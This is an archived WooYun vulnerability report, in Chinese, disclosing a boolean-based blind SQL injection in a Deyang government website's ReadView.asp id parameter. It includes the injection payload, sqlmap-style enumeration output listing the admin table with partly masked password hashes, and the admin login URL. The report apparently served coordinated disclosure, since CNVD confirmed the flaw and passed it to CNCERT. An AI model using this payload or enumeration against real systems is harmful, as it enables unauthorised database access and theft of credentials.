乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-13: 细节已通知厂商并且等待厂商处理中 2015-07-17: 厂商已经确认,细节仅向厂商公开 2015-07-27: 细节向核心白帽子及相关领域专家公开 2015-08-06: 细节向普通白帽子公开 2015-08-16: 细节向实习白帽子公开 2015-08-31: 细节向公众公开
德阳市国有资产委员会布尔盲注一枚,友情检测,并未深入,谢绝查水表
注入点:
http://dygzw.dyjr.gov.cn/ReadView.asp?id=1063
通过字符报错初步判断存在注入:
Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1063 AND 8097=8097---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb[3 tables]+---------+| admin || article || content |+---------+
Database: Microsoft_Access_masterdbTable: admin[7 columns]+-----------+-------------+| Column | Type |+-----------+-------------+| adminid | numeric || adminmail | non-numeric || adminname | non-numeric || adminpass | non-numeric || adminuser | non-numeric || articleid | numeric || username | non-numeric |+-----------+-------------+
用户:
Table: admin[2 entries]+---------+-----------+----------+-----------+-----------+--------------------------------+-----------+| adminid | articleid | username | adminname | adminmail | adminpass | adminuser |+---------+-----------+----------+-----------+-----------+--------------------------------+-----------+| 1 | 1063 | z* | _* | OK | 50289D988596787********** | d* || 47 | 1063 | z* | a* | NULL | 20F76A2980B8B87********** | a* |+---------+-----------+----------+-----------+-----------+--------------------------------+-----------+
后台地址:http://dygzw.dyjr.gov.cn/loginAdmin.asp政府网站就不深入下去了,我怕查水表...
危害等级:高
漏洞Rank:10
确认时间:2015-07-17 15:55
CNVD确认并复现所述情况,已经转由CNCERT下发给相应分中心,由其后续协调网站管理单位处置。
暂无